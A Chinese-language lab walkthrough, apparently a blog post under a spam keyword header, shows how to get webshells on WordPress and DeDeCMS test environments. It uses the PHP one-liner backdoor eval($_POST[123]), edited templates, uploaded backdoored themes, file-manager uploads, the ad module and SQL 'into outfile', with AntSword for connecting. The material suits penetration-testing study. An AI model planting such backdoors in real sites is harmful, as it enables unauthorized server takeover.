网站建站加盟,网站设计案例方案,深圳 互联网公司,wordpress标题怎么Wordperss漏洞
环境搭建
#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://8.155.7.173:8080/wp-admin/ 注册账号 登录 漏洞一#xff1a;后台修改模板拿WebShell 步骤一#xff1a;思路是修改其WP的模板写入⼀句话木马后门并访问其文件…
Wordperss漏洞
环境搭建
#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://8.155.7.173:8080/wp-admin/ 注册账号 登录 漏洞一后台修改模板拿WebShell 步骤一思路是修改其WP的模板写入⼀句话木马后门并访问其文件即可GetShell登陆WP后点击 【Appearance】 --author-bio.php 步骤二在其模板中插入一句话木马代码..点击 【Update File】 按钮
?php eval($_POST[123]);? 步骤三访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/twentyfifteen/author-bio.php 步骤四尝试蚁剑连接获取webshell 漏洞二上传主题拿WebShell
步骤⼀接着上⼀个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP⽂件
先去下载一个免费模板
https://blog.csdn.net/m0_59768231/article/details/144777066?spm1001.2014.3001.5502 解压后打开第一个文件夹写入一句话木马 重新压缩为一个.zip压缩包
步骤二找到网站上传模板主题的位置 选中我们刚才重新压缩好的文件 步骤三访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/moban-1354265872-wordpress329-sprout-in-hands-10/1.php 步骤四尝试蚁剑连接获取webshell DeDeCMS漏洞
环境搭建 傻瓜式安装 漏洞一通过文件管理器上传WebShel
步骤⼀:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件可以通过⽂件管理器上传php文件获取webshell
登陆网站后台 步骤二登陆到后台点击 【核心】 --》 【文件式管理器】 --》 【文件上传】 将准备好的恶意代码上传 步骤三访问上传成功后的文件
http://127.0.0.1/dedecms/uploads/1.php 漏洞二修改模板文件拿WebShell
步骤⼀与WPCMS类似直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》【index.htm】 -- 【修改】 进入后添加恶意代码 步骤二点击 【胜成】 --》 【更新主页HTML】 --》将主页位置修改为【../index.php 】--》点击 【生成静态】 --》点击 【更新主页】 再次访问站点首页可发现变化 步骤三访问主页phpinfo更新成功 漏洞三后台任意命令执行拿WebShell
步骤一点击 【模块】 --》 【广告管理】 --》 【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】 步骤二点击【代码】--》在图中显示的路径与站点进行拼接 http://127.0.0.1/dedecms/plus/ad_js.php?aid1 步骤三使用蚁剑测试连接 漏洞四通过后台sql命令执行拿webshell
步骤一访问系统---sql命令行工具---执行 select basedir获取mysql路径由此瑞测网站绝对路径 猜测绝对路径为E:/phpStudy/PHPTutorial/
步骤二into outfile写入一句话木马 步骤三使用蚁剑测试连接